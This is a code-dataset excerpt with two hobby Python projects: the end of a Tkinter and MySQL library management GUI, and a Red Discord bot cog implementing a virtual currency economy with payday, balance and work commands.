lblDateOverDue.grid(row=7, column=2, sticky=W)\r\n txtDateOverDue = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.dateoverdue, width=35)\r\n txtDateOverDue.grid(row=7, column=3)\r\n\r\n lblActualPrice = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Actual Price \", padx=2, pady=6)\r\n lblActualPrice.grid(row=8, column=2, sticky=W)\r\n txtActualPrice = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.finalprice, width=35)\r\n txtActualPrice.grid(row=8, column=3)\r\n \r\n \r\n\r\n # =================Data Frame Right===========================\r\n \r\n \r\n\r\n self.txtBox = Text(DataFrameRight, font=(\"arial\",13,\"bold\"), width=32, height=16)\r\n self.txtBox.grid(row=0, column=2,padx=2)\r\n \r\n listScrollBar = Scrollbar(DataFrameRight) \r\n listScrollBar.grid(row=0,column=1,sticky=\"ns\")\r\n\r\n listBooks = [\"Web Development\", \"Python\", \"Machine Learning\", \"Deep Learning\", \r\n \"Ethical Hacking\", \"Java\", \"C/C++\", \"JavaScript\",\r\n \"The Richest Engineer\",\"Software Engineering\",\"Python Advance\",\r\n \"Statics\",\"Let's Code\",\"Crack Code\",\"The Adavnce Machine Learning\",\r\n \"Artificial Intelligence\",\"Big Data\",\"Probability\",\"Data Science\",\"HTML\",\"CSS\",\"The Ghost\"]\r\n \r\n \r\n def SelectBook(event=\"\"):\r\n value=str(listBox.get(listBox.curselection()))\r\n x=value\r\n d1=datetime.datetime.today()\r\n d2=datetime.timedelta(days=15)\r\n d3=d1+d2\r\n self.dateborrowed.set(d1)\r\n 
self.datedue.set(d3)\r\n self.daysonbook.set(15)\r\n self.latefine.set(50)\r\n self.dateoverdue.set(\"NO\")\r\n \r\n if (x==\"Web Development\"):\r\n self.bookid.set(1123)\r\n self.booktittle.set(\"Make Web\")\r\n self.author.set(\"James\")\r\n self.finalprice.set(890)\r\n \r\n \r\n \r\n elif (x==\"Python\"):\r\n self.bookid.set(1124)\r\n self.booktittle.set(\"To build an AI\")\r\n self.author.set(\"Andy Smith\")\r\n self.finalprice.set(670)\r\n \r\n \r\n \r\n elif (x==\"Machine Learning\"):\r\n self.bookid.set(1125)\r\n self.booktittle.set(\"Human and Machine\")\r\n self.author.set(\"JJ Thomson\")\r\n self.finalprice.set(550)\r\n \r\n elif (x==\"Deep Learning\"):\r\n self.bookid.set(1126)\r\n self.booktittle.set(\"To build an AI\")\r\n self.author.set(\"Kris Starlet\")\r\n self.finalprice.set(400)\r\n \r\n elif (x==\"Ethical Hacking\"):\r\n self.bookid.set(1127)\r\n self.booktittle.set(\"Hack the Code\")\r\n self.author.set(\"Downey A\")\r\n self.finalprice.set(720)\r\n \r\n elif (x==\"Java\"):\r\n self.bookid.set(11281)\r\n self.booktittle.set(\"Java Core\")\r\n self.author.set(\"Mathew\")\r\n self.finalprice.set(989)\r\n \r\n elif (x==\"C/C++\"):\r\n self.bookid.set(11249)\r\n self.booktittle.set(\"Basic Computer Language\")\r\n self.author.set(\"MK Jordan\")\r\n self.finalprice.set(1050)\r\n \r\n elif (x==\"JavaScript\"):\r\n self.bookid.set(42347)\r\n self.booktittle.set(\"Java Script\")\r\n self.author.set(\"ST Clerk\")\r\n self.finalprice.set(1670)\r\n \r\n elif (x==\"The Richest Engineer\"):\r\n self.bookid.set(85846)\r\n self.booktittle.set(\"To become a rich coder\")\r\n self.author.set(\"Albert Rey\")\r\n self.finalprice.set(850)\r\n \r\n elif (x==\"Software Engineering\"):\r\n self.bookid.set(93646)\r\n self.booktittle.set(\"System Software \")\r\n self.author.set(\"Frankin Steve\")\r\n self.finalprice.set(2340)\r\n \r\n elif (x==\"Python Advance\"):\r\n self.bookid.set(65837)\r\n self.booktittle.set(\"Python Programming\")\r\n self.author.set(\"Ronny Bitz\")\r\n self.finalprice.set(170)\r\n \r\n elif (x==\"Statics\"):\r\n self.bookid.set(47576)\r\n self.booktittle.set(\"Statics\")\r\n self.author.set(\"Sweezy Smith\")\r\n self.finalprice.set(600)\r\n \r\n elif (x==\"Let's Code\"):\r\n self.bookid.set(38723)\r\n self.booktittle.set(\"Solve the code\")\r\n self.author.set(\"Deniel Paul\")\r\n self.finalprice.set(730)\r\n \r\n elif (x==\"Crack Code\"):\r\n self.bookid.set(67473)\r\n self.booktittle.set(\"Learn Coding easily\")\r\n self.author.set(\"Caten George\")\r\n self.finalprice.set(1240)\r\n \r\n elif (x==\"The Adavnce Machine Learning\"):\r\n self.bookid.set(12378)\r\n self.booktittle.set(\"Machine Learning\")\r\n self.author.set(\"Robert Alex\")\r\n self.finalprice.set(1770)\r\n \r\n elif (x==\"Artificial Intelligence\"):\r\n self.bookid.set(19723)\r\n self.booktittle.set(\"How to make human robot\")\r\n self.author.set(\"Andrew Paul\")\r\n self.finalprice.set(610)\r\n \r\n elif (x==\"Big Data\"):\r\n self.bookid.set(23789)\r\n self.booktittle.set(\"Large Data\")\r\n self.author.set(\"Rushkin Bond\")\r\n self.finalprice.set(2149)\r\n \r\n elif (x==\"Probability\"):\r\n self.bookid.set(65789)\r\n self.booktittle.set(\"advance maths\")\r\n self.author.set(\"Preeti Shenoy\")\r\n self.finalprice.set(950)\r\n \r\n elif (x==\"Data Science\"):\r\n self.bookid.set(45856)\r\n self.booktittle.set(\"To Grow Business\")\r\n self.author.set(\"Shasi Tharoor\")\r\n self.finalprice.set(2550)\r\n \r\n elif (x==\"HTML\"):\r\n self.bookid.set(86342)\r\n self.booktittle.set(\"Structure of 
web\")\r\n self.author.set(\"Roger Faligot\")\r\n self.finalprice.set(640)\r\n \r\n elif (x==\"CSS\"):\r\n self.bookid.set(16487)\r\n self.booktittle.set(\"Beauty of Website\")\r\n self.author.set(\"Usha Uthup\")\r\n self.finalprice.set(570)\r\n \r\n else:\r\n self.bookid.set(364087)\r\n self.booktittle.set(\"The Ghost\")\r\n self.author.set(\"Richa Misra\")\r\n self.finalprice.set(780)\r\n \r\n \r\n \r\n listBox =Listbox(DataFrameRight,font=(\"arial\" ,12,\"bold\"),width=20,height=15)\r\n listBox.bind(\"<>\",SelectBook) \r\n listBox.grid(row=0,column=0,padx=2)\r\n \r\n listScrollBar.config(command=listBox.yview)\r\n \r\n for item in listBooks:\r\n listBox.insert(END,item)\r\n \r\n \r\n\r\n # =================Buttons===========================\r\n\r\n btnAddData = Button(ButtonFrame,command=self.Add_data, text=\"Add Data\", bg=\"Blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnAddData.grid(row=0, column=0)\r\n\r\n btnShowData = Button(ButtonFrame,command=self.show_data, text=\"Show Data\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnShowData.grid(row=0, column=1)\r\n\r\n btnUpdate = Button(ButtonFrame,command=self.update, text=\"Update\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnUpdate.grid(row=0, column=2)\r\n\r\n btnDelete = Button(ButtonFrame,command=self.delete, text=\"Delete\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnDelete.grid(row=0, column=3)\r\n\r\n btnClear = Button(ButtonFrame, command=self.clear, text=\"Clear\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnClear.grid(row=0, column=4)\r\n\r\n btnExit = Button(ButtonFrame,command=self.exit, text=\"Exit\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnExit.grid(row=0, column=5)\r\n \r\n \r\n \r\n #======================Table of Information Frame===================\r\n #======================scrollbar===============\r\n \r\n Table_frame= Frame(DetailsFrame,bd=6, relief= RIDGE, bg=\"powder blue\")\r\n Table_frame.place(x=0,y=2,width=1470,height=150)\r\n \r\n \r\n\r\n scroll_x=ttk.Scrollbar(Table_frame,orient=HORIZONTAL)\r\n scroll_y=ttk.Scrollbar(Table_frame,orient=VERTICAL)\r\n \r\n self.library_table = ttk.Treeview(Table_frame,column=(\"membertype\",\"prn\",\"idno\",\"firstname\",\"lastname\",\r\n \"adress1\",\"adress2\",\"postcode\",\"mobile\",\"bookid\",\"booktittle\",\"author\",\"dateborrowed\",\r\n \"datedue\",\"days\",\"latereturnfine\",\"dateoverdue\",\"finalprice\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n scroll_x.pack(side=BOTTOM , fill=X)\r\n scroll_y.pack(side=RIGHT,fill=Y)\r\n\r\n scroll_x.config(command=self.library_table.xview)\r\n scroll_y.config(command=self.library_table.yview)\r\n\r\n self.library_table.heading(\"membertype\",text=\"Member \")\r\n self.library_table.heading(\"prn\",text=\"Reg Number\")\r\n self.library_table.heading(\"idno\",text=\"Id Number\")\r\n self.library_table.heading(\"firstname\",text=\"First Name\")\r\n self.library_table.heading(\"lastname\",text=\"Last Name\")\r\n self.library_table.heading(\"adress1\",text=\"Adress1\")\r\n self.library_table.heading(\"adress2\",text=\"Adress2\")\r\n self.library_table.heading(\"postcode\",text=\"Post Code\")\r\n self.library_table.heading(\"mobile\",text=\"Mobile\")\r\n self.library_table.heading(\"bookid\",text=\"Book 
Id\")\r\n self.library_table.heading(\"booktittle\",text=\"Book Tittle\")\r\n self.library_table.heading(\"author\",text=\"Author\")\r\n self.library_table.heading(\"dateborrowed\",text=\"Date of Borrowed\")\r\n self.library_table.heading(\"datedue\",text=\"Date Due\")\r\n self.library_table.heading(\"days\",text=\"Days on Book\")\r\n self.library_table.heading(\"latereturnfine\",text=\"Late Return Fine\")\r\n self.library_table.heading(\"dateoverdue\",text=\"Date Over Due\")\r\n self.library_table.heading(\"finalprice\",text=\"Actual Price\") \r\n\r\n self.library_table[\"show\"]=\"headings\"\r\n\r\n self.library_table.column(\"membertype\",width=100)\r\n self.library_table.column(\"prn\",width=100)\r\n self.library_table.column(\"idno\",width=100)\r\n self.library_table.column(\"firstname\",width=100)\r\n self.library_table.column(\"lastname\",width=100)\r\n self.library_table.column(\"adress1\",width=100)\r\n self.library_table.column(\"adress2\",width=100)\r\n self.library_table.column(\"postcode\",width=100)\r\n self.library_table.column(\"mobile\",width=100)\r\n self.library_table.column(\"bookid\",width=100)\r\n self.library_table.column(\"booktittle\",width=100)\r\n self.library_table.column(\"author\",width=100)\r\n self.library_table.column(\"dateborrowed\",width=100)\r\n self.library_table.column(\"datedue\",width=100)\r\n self.library_table.column(\"days\",width=100)\r\n self.library_table.column(\"latereturnfine\",width=100)\r\n self.library_table.column(\"dateoverdue\",width=100)\r\n self.library_table.column(\"finalprice\",width=100) \r\n\r\n self.library_table.pack(fill=BOTH,expand=1)\r\n self.fetch_data()\r\n self.library_table.bind(\"\", self.get_cursor)\r\n \r\n def Add_data(self):\r\n conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"insert into library values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",(\r\n \r\n self.member.get(),\r\n self.prn.get(),\r\n self.id.get(),\r\n self.firstname.get(),\r\n self.lastname.get(),\r\n self.adress1.get(),\r\n self.adress2.get(),\r\n self.postcode.get(),\r\n self.mobile.get(),\r\n self.bookid.get(),\r\n self.booktittle.get(),\r\n self.author.get(),\r\n self.dateborrowed.get(),\r\n self.datedue.get(),\r\n self.daysonbook.get(),\r\n self.latefine.get(),\r\n self.dateoverdue.get(),\r\n self.finalprice.get() \r\n ))\r\n \r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n \r\n messagebox.showinfo(\"Success\",\"Member has been inserted successfully\")\r\n \r\n def fetch_data(self):\r\n conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from library\")\r\n rows=my_cursor.fetchall()\r\n\r\n if len(rows)!=0:\r\n self.library_table.delete(*self.library_table.get_children())\r\n for i in rows:\r\n self.library_table.insert(\"\",END,values=i)\r\n\r\n conn.commit()\r\n conn.close()\r\n \r\n def get_cursor(self,event=\"\"):\r\n cursor_row = self.library_table.focus()\r\n content = self.library_table.item(cursor_row)\r\n row=content[\"values\"]\r\n\r\n self.member.set(row[0]),\r\n self.prn.set(row[1]),\r\n self.id.set(row[2]),\r\n \r\n self.firstname.set(row[3]),\r\n self.lastname.set(row[4]),\r\n self.adress1.set(row[5]),\r\n self.adress2.set(row[6]),\r\n self.postcode.set(row[7]),\r\n self.mobile.set(row[8]),\r\n self.bookid.set(row[9]),\r\n self.booktittle.set(row[10]),\r\n self.author.set(row[11]),\r\n 
self.dateborrowed.set(row[12]),\r\n        self.datedue.set(row[13]),\r\n        self.daysonbook.set(row[14]),\r\n        self.latefine.set(row[15]),\r\n        self.dateoverdue.set(row[16]),\r\n        self.finalprice.set(row[17])\r\n        \r\n    def show_data(self):\r\n        self.txtBox.insert(END,\"Member\\t\\t \" + self.member.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Reg Number\\t\\t \" + self.prn.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Id Number\\t\\t \" + self.id.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"First Name\\t\\t \" + self.firstname.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Last Name\\t\\t \" + self.lastname.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Adress1\\t\\t \" + self.adress1.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Adress2\\t\\t \" + self.adress2.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Post Code\\t\\t \" + self.postcode.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Mobile\\t\\t \" + self.mobile.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Book Id\\t\\t \" + self.bookid.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Book Tittle\\t\\t \" + self.booktittle.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Author\\t\\t \" + self.author.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Date of Borrowed\\t\\t \" + self.dateborrowed.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Date Due\\t\\t \" + self.datedue.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Days on Book\\t\\t \" + self.daysonbook.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Late Return Fine\\t\\t \" + self.latefine.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Date Over Due\\t\\t \" + self.dateoverdue.get() + \"\\n\")\r\n        self.txtBox.insert(END,\"Actual Price\\t\\t \" + self.finalprice.get() + \"\\n\")\r\n        \r\n        \r\n    def clear(self):\r\n        self.member.set(\"\"),\r\n        self.prn.set(\"\"),\r\n        self.id.set(\"\"),\r\n        self.firstname.set(\"\"),\r\n        self.lastname.set(\"\"),\r\n        self.adress1.set(\"\"),\r\n        self.adress2.set(\"\"),\r\n        self.postcode.set(\"\"),\r\n        self.mobile.set(\"\"),\r\n        self.bookid.set(\"\"),\r\n        self.booktittle.set(\"\"),\r\n        self.author.set(\"\"),\r\n        self.dateborrowed.set(\"\"),\r\n        self.datedue.set(\"\"),\r\n        self.daysonbook.set(\"\"),\r\n        self.latefine.set(\"\"),\r\n        self.dateoverdue.set(\"\"),\r\n        self.finalprice.set(\"\") \r\n        \r\n        self.txtBox.delete(\"1.0\",END)\r\n        \r\n    def delete(self):\r\n        if self.prn.get()==\"\" or self.id.get()==\"\":\r\n            messagebox.showerror(\"Error\",\"Select the member\")\r\n\r\n        else:\r\n            conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n            my_cursor=conn.cursor()\r\n            query=\"DELETE FROM library WHERE PRN_No=%s\"\r\n            value=(self.prn.get(),)\r\n            my_cursor.execute(query,value)\r\n\r\n            conn.commit()\r\n            self.fetch_data()\r\n            self.clear()\r\n            conn.close()\r\n            \r\n            messagebox.showinfo(\"Success\",\"Member has been deleted\")\r\n        \r\n        \r\n    def update(self):\r\n        conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n        my_cursor=conn.cursor()\r\n        my_cursor.execute(\"UPDATE library SET Member=%s, ID =%s,FirstName=%s,LastName=%s,Adress1=%s,Adress2=%s,PostCode=%s,Mobile=%s,Book_Id=%s,Book_Tittle=%s,Author=%s,Date_Borrowed=%s,Date_Due=%s,Days_On_Book=%s,Late_Return_fee=%s,DateOverDue=%s,Final_Price=%s WHERE PRN_No=%s\",(\r\n            self.member.get(),\r\n            self.id.get(),\r\n            self.firstname.get(),\r\n            self.lastname.get(),\r\n            self.adress1.get(),\r\n            self.adress2.get(),\r\n            self.postcode.get(),\r\n            self.mobile.get(),\r\n            self.bookid.get(),\r\n            self.booktittle.get(),\r\n            self.author.get(),\r\n            
self.dateborrowed.get(),\r\n self.datedue.get(),\r\n self.daysonbook.get(),\r\n self.latefine.get(),\r\n self.dateoverdue.get(),\r\n self.finalprice.get(),\r\n self.prn.get()\r\n ))\r\n \r\n conn.commit()\r\n self.fetch_data()\r\n self.clear()\r\n conn.close()\r\n\r\n messagebox.showinfo(\"Success\", \"Data has been updated successfully\")\r\n \r\n def exit(self):\r\n res=messagebox.askquestion('Exit Application', 'Do you really want to exit')\r\n if res == 'yes' :\r\n root.destroy()\r\n else :\r\n messagebox.showinfo('Return', 'Returning to main application')\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n root = Tk()\r\n obj = LibraryMangementSystem(root)\r\n root.mainloop()\r\n\r\n\r\n ", "repo_name": "mohdasif022/python-projects", "sub_path": "Library Management System/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 30709, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tkinter.ttk.Combobox", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 79, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 222, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 222, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 223, "usage_type": "call"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 416, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 416, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 417, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 417, "usage_type": "name"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 419, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 419, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 473, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 473, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 473, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 501, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 501, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 504, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 504, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 504, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 587, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 587, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 590, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 590, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 590, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 601, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 601, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 605, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 605, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 605, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 633, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 633, "usage_type": "name"}, {"api_name": 
"tkinter.messagebox.askquestion", "line_number": 636, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 636, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 640, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 640, "usage_type": "name"}]} +{"seq_id": "9076437466", "text": "from typing import Literal, Optional\n\nimport discord\nfrom discord.ext.commands.core import cooldown\nfrom redbot.core import commands\nfrom redbot.core.bot import Red\nfrom redbot.core.config import Config\nimport datetime\nfrom redbot.core import bank\nfrom redbot.core.utils.chat_formatting import humanize_number\nimport random\n\nRequestType = Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"]\n\n_JOBS = [\n \"You work at McRonalds serving fries and gain {amount} {credit_name}.\",\n \"You work at McRonalds frying chicken and gain {amount} {credit_name}.\",\n \"You work at McRonalds serving burgers and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling phones and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling computers and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling monitors and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling keyboards and gain {amount} {credit_name}.\",\n \"You work at Alti selling blush and gain {amount} {credit_name}.\",\n \"You work at Alti selling lipstick and gain {amount} {credit_name}.\",\n \"You work at Alti selling eyeshadow and gain {amount} {credit_name}.\",\n \"You work with aikaterna on Audio and earn {amount} {credit_name} for dealing with Java.\",\n \"You work with Slime and get... slimed. Gain {amount} {credit_name} for having to deal with that.\",\n \"You host Red on Heroku and lose {amount}.\",\n \"You try to host Red on repl.it and lose {amount} {credit_name}.\",\n]\n\n\nclass AdvancedEconomy(commands.Cog):\n \"\"\"\n An advanced economy cog.\n \"\"\"\n\n __version__ = \"1.0.1\"\n\n def format_help_for_context(self, ctx):\n \"\"\"Thanks Sinbad!\"\"\"\n pre_processed = super().format_help_for_context(ctx)\n n = \"\\n\" if \"\\n\\n\" not in pre_processed else \"\"\n return f\"{pre_processed}{n}\\nCog Version: {self.__version__}\"\n\n def __init__(self, bot: Red) -> None:\n self.bot = bot\n self.config = Config.get_conf(\n self,\n identifier=572944636209922059,\n force_registration=True,\n )\n default_global = {\n \"default_payday\": 500,\n \"payday_cooldown\": 300,\n }\n default_user = {\n \"next_payday\": 0,\n }\n self.config.register_global(**default_global)\n self.config.register_user(**default_user)\n self.startup_task = self.bot.loop.create_task(self.startup())\n\n def cog_unload(self):\n self.startup_task.cancel()\n\n async def startup(self):\n await bank.set_global(True)\n\n async def red_delete_data_for_user(\n self, *, requester: RequestType, user_id: int\n ) -> None:\n # TODO: Replace this with the proper end user data removal handling.\n return\n\n @commands.group()\n @commands.guild_only()\n @commands.is_owner()\n async def economyset(self, ctx):\n \"\"\"\n Economy and bank settings\n \"\"\"\n pass\n\n @economyset.command()\n async def setpayday(self, ctx: commands.Context, amount: int) -> None:\n \"\"\"\n Set the default payday amount.\n\n Default: `500`\n \"\"\"\n # Add amount arg to config\n if amount <= 0:\n await ctx.send(\"This value can't be set below 0.\")\n else:\n await self.config.default_payday.set(amount)\n await ctx.tick()\n\n @economyset.command()\n async def setcooldown(self, ctx: 
commands.Context, cooldown: int):\n        \"\"\"\n        Set cooldown (in seconds)\n\n        Default: `300`\n        \"\"\"\n        if cooldown <= 0:\n            await ctx.send(\"This value can't be set below 0.\")\n        else:\n            await self.config.payday_cooldown.set(cooldown)\n            await ctx.tick()\n\n    @economyset.command()\n    async def about(self, ctx):\n        \"\"\"\n        How to set other settings not found here\n        \"\"\"\n        embed = discord.Embed(title=\"AdvancedEconomy\")\n        embed.add_field(\n            name=\"How do I set more commands??\",\n            value=\"More commands, such as setting the credit name, bank name, and setting the maximum balance a user can have, are located in the Bank cog. Do not change the `bankset setglobal` value, as this will cause problems with AdvancedEconomy.\",\n            inline=False,\n        )\n        embed.add_field(\n            name=\"How do I get to the Bank cog?\",\n            value=f\"You can load the Bank cog with `{ctx.prefix}load bank`. \",\n            inline=False,\n        )\n        embed.set_footer(text=\"AdvancedEconomy\")\n        await ctx.send(embed=embed)\n\n    @commands.command()\n    @commands.guild_only()\n    async def payday(self, ctx: commands.Context):\n        \"\"\"\n        Get daily money\n        \"\"\"\n        if await self.config.user(\n            ctx.author\n        ).next_payday() == None or await self.config.user(\n            ctx.author\n        ).next_payday() <= int(\n            datetime.datetime.now(datetime.timezone.utc).timestamp()\n        ):\n            currency = await self.config.default_payday()\n            next_payday_config = await self.config.payday_cooldown()\n            next_payday = (\n                int(datetime.datetime.now(datetime.timezone.utc).timestamp())\n                + next_payday_config\n            )\n            credit_name = await bank.get_currency_name()\n            current_bal = await bank.get_balance(ctx.author)\n            try:\n                await bank.deposit_credits(amount=currency, member=ctx.author)\n            except bank.errors.BalanceTooHigh as e:\n                await bank.set_balance(ctx.author, e.max_balance)\n            current_bal = await bank.get_balance(ctx.author)\n            msg = (\n                f\"You just earned {currency} {credit_name}!\\n\\n\"\n                f\"Your new balance is {humanize_number(current_bal)} {credit_name}\\n\\n\"\n                f\"Come back to claim more money!\"\n            )\n            if await ctx.embed_requested():\n                embed = discord.Embed(\n                    title=\"PAYDAY!! 🤑💰🤑\", color=await ctx.embed_color()\n                )\n                embed.add_field(\n                    name=\"It's time to get paid!\",\n                    value=msg,\n                    inline=False,\n                )\n                embed.set_footer(text=\"💸💸\")\n                await ctx.send(embed=embed)\n            else:\n                await ctx.send(f\"**Payday!!**\\n\\n{msg}\")\n            await self.config.user(ctx.author).next_payday.set(next_payday)\n            return\n\n        if await self.config.user(ctx.author).next_payday() >= int(\n            datetime.datetime.now(datetime.timezone.utc).timestamp()\n        ):\n            currency = await self.config.default_payday()\n            next_payday = await self.config.user(ctx.author).next_payday()\n            current_bal = await bank.get_balance(ctx.author)\n            await ctx.send(\n                f\"Sorry, you can't redeem your payday yet! 
You can redeem your next payday <t:{next_payday}:R>.\"\n            )\n\n    @commands.command(aliases=[\"bal\"])\n    @commands.guild_only()\n    async def balance(self, ctx):\n        \"\"\"\n        Get your bank balance.\n        \"\"\"\n        current_bal = await bank.get_balance(ctx.author)\n        credit_name = await bank.get_currency_name()\n        await ctx.send(f\"{ctx.author.mention}, your balance is {humanize_number(current_bal)} {credit_name}\")\n\n    @commands.command(aliases=[\"job\"])\n    @commands.cooldown(1, 3600, commands.BucketType.user)\n    @commands.guild_only()\n    async def work(self, ctx):\n        \"\"\"\n        Work at a job and gain/lose some currency.\n        \"\"\"\n        _range = random.randint(10, 1000)\n        random_index = random.choice(_JOBS)\n        credit_name = await bank.get_currency_name()\n        message = await ctx.send(\n            random_index.format(amount=str(_range), credit_name=credit_name)\n        )\n        if \"lose\" in message.content:\n            try:\n                await bank.withdraw_credits(amount=_range, member=ctx.author)\n            except ValueError:\n                await ctx.send(\n                    \"You would've lost money on this payday, but you have nothing to lose! \"\n                )\n                await bank.set_balance(member=ctx.author, amount=0)\n        else:\n            try:\n                await bank.deposit_credits(amount=_range, member=ctx.author)\n            except bank.errors.BalanceTooHigh as e:\n                await bank.set_balance(ctx.author, e.max_balance)\n", "repo_name": "OofChair/OofCogs", "sub_path": "advancedeconomy/advancedeconomy.py", "file_name": "advancedeconomy.py", "file_ext": "py", "file_size_in_byte": 8482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Literal", "line_number": 13, "usage_type": "name"}, {"api_name": "redbot.core.commands.Cog", "line_number": 33, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 33, "usage_type": "name"}, {"api_name": "redbot.core.bot.Red", "line_number": 46, "usage_type": "name"}, {"api_name": "redbot.core.config.Config.get_conf", "line_number": 48, "usage_type": "call"}, {"api_name": "redbot.core.config.Config", "line_number": 48, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_global", "line_number": 68, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 68, "usage_type": "name"}, {"api_name": "redbot.core.commands.group", "line_number": 76, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 76, "usage_type": "name"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 77, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 77, "usage_type": "name"}, {"api_name": "redbot.core.commands.is_owner", "line_number": 78, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 78, "usage_type": "name"}, {"api_name": "redbot.core.commands.Context", "line_number": 86, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 86, "usage_type": "name"}, {"api_name": "redbot.core.commands.Context", "line_number": 100, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 100, "usage_type": "name"}, {"api_name": "discord.ext.commands.core.cooldown", "line_number": 106, "usage_type": "name"}, {"api_name": "discord.ext.commands.core.cooldown", "line_number": 109, "usage_type": "argument"}, {"api_name": "discord.Embed", "line_number": 117, "usage_type": "call"}, {"api_name": "redbot.core.commands.Context", "line_number": 133, "usage_type": "attribute"}, {"api_name": "redbot.core.commands", "line_number": 133, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 142, 
